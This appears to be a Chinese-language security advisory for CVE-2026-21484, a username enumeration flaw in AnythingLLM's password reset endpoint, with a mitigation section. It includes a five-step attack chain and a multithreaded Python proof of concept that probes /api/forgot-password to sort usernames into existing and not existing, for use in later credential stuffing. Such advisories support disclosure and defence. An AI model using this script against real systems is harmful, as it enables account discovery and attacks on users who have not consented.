CVE-2026-21484 AnythingLLM密码恢复端点用户名枚举漏洞

漏洞信息

漏洞编号

CVE-2026-21484

漏洞类型

用户名枚举

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AnythingLLM

漏洞概述

AnythingLLM是一款将内容转换为上下文的应用，使任何LLM在聊天时都能将其作为参考。漏洞存在于该应用的密码恢复功能中，在修复版本之前，密码恢复端点会根据用户名是否存在返回不同的错误消息。攻击者可以利用这一差异，通过自动化工具遍历可能的用户名，快速识别系统中注册的有效账户。这种用户名枚举是进一步进行社会工程攻击、凭证填充攻击或暴力破解的基础。攻击者获取有效用户名后，可以针对这些账户实施更精准的攻击，显著提高攻击成功率。该漏洞无需任何权限或用户交互即可利用，属于低复杂度攻击。

技术细节

漏洞根源在于密码恢复端点的错误消息处理逻辑存在差异。当用户输入不存在的用户名时，系统返回如「用户名不存在」或「未找到该邮箱」的错误提示；而当输入已注册的用户名时，则返回「密码重置链接已发送」或类似的成功提示。这种差异使得攻击者可以通过批量请求测试不同的用户名组合，根据响应消息的特征快速枚举系统中所有已注册的用户账户。攻击者通常会使用自动化脚本或工具（如Burp Suite Intruder）配合常见用户名字典进行大规模扫描。该漏洞的技术影响虽然不直接导致数据泄露或系统沦陷，但为后续攻击提供了重要情报支持，属于信息泄露类漏洞的典型案例。

攻击链分析

STEP 1

步骤1

攻击者访问目标系统的密码恢复端点，通常为/api/forgot-password或类似路径

STEP 2

步骤2

攻击者使用自动化工具（如Burp Suite Intruder或自定义脚本）发送大量请求，尝试不同的用户名或邮箱地址

STEP 3

步骤3

根据返回的HTTP响应码或错误消息内容差异，判断每个用户名是否在系统中注册

STEP 4

步骤4

攻击者收集所有有效的用户名列表，为后续攻击（如凭证填充、社会工程或暴力破解）做准备

STEP 5

步骤5

利用枚举得到的用户名，结合常见密码字典或其他泄露数据，对目标账户实施进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import re from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_URL = "http://target-anything-llm.com" FORGOT_PASSWORD_ENDPOINT = f"{TARGET_URL}/api/forgot-password" # Common test usernames/emails for enumeration TEST_ACCOUNTS = [ "[email protected]", "[email protected]", "[email protected]", "admin", "root", "administrator" ] def test_username(username): """ Test if a username exists by checking the password recovery response. Returns True if username exists, False otherwise. """ try: response = requests.post( FORGOT_PASSWORD_ENDPOINT, json={"email": username}, headers={ "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" }, timeout=10 ) response_text = response.text.lower() response_json = response.json() if response.headers.get('content-type', '').find('json') != -1 else {} # Check for different error messages that indicate username existence # If the response indicates success or password reset sent, user exists success_patterns = [ "password reset", "reset link", "email sent", "check your email", "successfully" ] # If the response indicates user not found, user does not exist not_found_patterns = [ "not found", "does not exist", "no account", "invalid email", "user not found" ] for pattern in success_patterns: if pattern in response_text: return (username, True, "User exists - password reset initiated") for pattern in not_found_patterns: if pattern in response_text: return (username, False, "User does not exist") # If response codes differ based on user existence if response.status_code == 200 and response_json.get('success'): return (username, True, "User exists") elif response.status_code == 404: return (username, False, "User not found") return (username, None, f"Unknown response: {response.status_code}") except Exception as e: return (username, None, f"Error: {str(e)}") def main(): print(f"[*] Testing password recovery endpoint: {FORGOT_PASSWORD_ENDPOINT}") print(f"[*] Testing {len(TEST_ACCOUNTS)} usernames...\n") existing_users = [] with ThreadPoolExecutor(max_workers=5) as executor: futures = {executor.submit(test_username, user): user for user in TEST_ACCOUNTS} for future in as_completed(futures): username, exists, message = future.result() if exists: print(f"[+] VULNERABLE: {username} - {message}") existing_users.append(username) else: print(f"[-] Not found: {username}") print(f"\n[*] Found {len(existing_users)} existing users") return existing_users if __name__ == "__main__": main()

影响范围

AnythingLLM < e287fab56089cf8fcea9ba579a3ecdeca0daa313

防御指南

临时缓解措施

在官方补丁发布前，可通过配置Web应用防火墙（WAF）规则，限制来自单一IP的密码恢复请求频率，并在应用层统一密码恢复功能的错误消息返回逻辑，避免因消息差异导致的信息泄露。